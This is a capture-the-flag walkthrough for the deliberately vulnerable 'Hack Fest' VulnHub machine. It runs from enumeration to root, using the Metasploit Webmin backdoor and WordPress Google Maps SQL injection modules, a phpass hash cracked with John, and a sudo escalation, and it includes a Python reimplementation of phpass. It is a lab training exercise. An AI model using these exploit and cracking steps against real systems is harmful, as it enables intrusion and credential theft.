Hack Fest

The machine was part of my workshop for Hacker Fest 2019 at Prague. The difficulty level of this VM is “very easy”. There are two paths to exploit it. There are no intentional rabbit holes. There is a “[retracted]” injection (the exploit is part of MSF). Recovered credentials (username + hash) can be cracked by John and the rockyou.txt wordlist. A low-priv shell can be gained through the MSF exploit or by trying the credentials against “[retracted]”. Priv. esc. is simply done by “[retracted]”.

Url: HF VulnHub

Difficulty: Easy

Author: Martin Haller

Enumeration

Firstly, a netdiscover scan will reveal how the machine can be identified on the network:

netdiscover -i eth1

Then an nmap scan:

nmap -p- -A 192.168.56.112

FTP

The port scan reveals ports 21 (FTP), 22 (SSH) and 10000, which appears to be hosting Webmin. I will first attempt to connect via FTP as the anonymous user. This turned out to be an extremely easy way to gain access to all of the WordPress site's files; however, I will also explore the other routes, which require actual exploitation.

Some simple enumeration, combined with an understanding of how back-end web apps store their configuration, will get you the right information from these files.

Webmin

Some research shows that Webmin 1.920 has known vulnerabilities. I use searchsploit to list them, and I am particularly interested in the unauthenticated remote code execution.

In the Metasploit console, we select the Webmin exploit and fill out the necessary options as shown below:

msfconsole
use exploit/linux/http/webmin_backdoor
show options
set rhosts 192.168.56.112
set ssl true
set lhost 192.168.56.101

The exploit is ready to go.

exploit
id

Root access.

Wordpress

Another attack vector is the Wordpress site on port 80.

WPScan will be used to find vulnerable plugins and possible users on the website. Note that you need a WPScan API token to see the vulnerability data in the results.

wpscan --url http://192.168.56.112/ -e vp,u

After some research, the Unauthenticated SQL Injection vulnerability seems like the best route to go down. There is a Metasploit module for this.

Something else to note is the username ‘webmaster’ found on the Wordpress site.

msfconsole
use auxiliary/admin/http/wp_google_maps_sqli
show options
set RHOSTS 192.168.56.112

The exploit has been correctly set up. Run the exploit.

exploit

A password hash has been returned for the username ‘webmaster’, which matches the user found earlier in the WPScan results.

 192.168.56.112:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 [email protected] 

Let’s ask our friend John to crack it. Use rockyou.txt as the wordlist.

echo '$P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1' > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

The password “kittykat1” has been returned.
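The string John cracked above is a WordPress phpass hash: `$P$`, one cost character, an 8-character salt and a 22-character encoded digest. As an added example (not part of the original write-up), the Python below parses that format and reimplements the phpass scheme WordPress uses, so you can see exactly what John recomputes for each candidate and how cheap a 2^13-round MD5 hash is to test; the salt used when generating a fresh hash is a constructed value.

```python
import hashlib
import hmac

# phpass alphabet: indexes the cost character and drives its base64-like packing.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def parse_phpass(stored: str) -> dict:
    """Split a $P$/$H$ hash into cost, iteration count, salt and encoded digest."""
    if len(stored) < 12 or stored[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass hash")
    cost = ITOA64.index(stored[3])
    if not 7 <= cost <= 30:
        raise ValueError("cost character out of range")
    return {"cost": cost, "iterations": 1 << cost, "salt": stored[4:12], "digest": stored[12:]}


def _encode64(data: bytes) -> str:
    """phpass's own 3-bytes-to-4-chars packing; 16 digest bytes become 22 chars."""
    out, i, n = "", 0, len(data)
    while i < n:
        value, i = data[i], i + 1
        out += ITOA64[value & 0x3F]
        if i < n:
            value |= data[i] << 8
        out += ITOA64[(value >> 6) & 0x3F]
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out += ITOA64[(value >> 12) & 0x3F]
        if i >= n:
            break
        i += 1
        out += ITOA64[(value >> 18) & 0x3F]
    return out


def phpass_crypt(password: str, setting: str) -> str:
    """Recompute the hash: md5(salt + pw), then 2**cost further rounds of md5(h + pw)."""
    fields = parse_phpass(setting[:12])
    pw = password.encode()
    h = hashlib.md5(fields["salt"].encode() + pw).digest()
    for _ in range(fields["iterations"]):
        h = hashlib.md5(h + pw).digest()
    return setting[:12] + _encode64(h)


def phpass_verify(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored WordPress hash."""
    return hmac.compare_digest(phpass_crypt(password, stored[:12]), stored)
```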

Let’s try to connect via SSH with the recovered credentials:

ssh webmaster@192.168.56.112
kittykat1

We are logged in as webmaster. Check the sudo privileges with the following command:

sudo -l

This user is basically already root so let’s just change to root shell with the following:

sudo -i

And we are root.

Written on May 3, 2020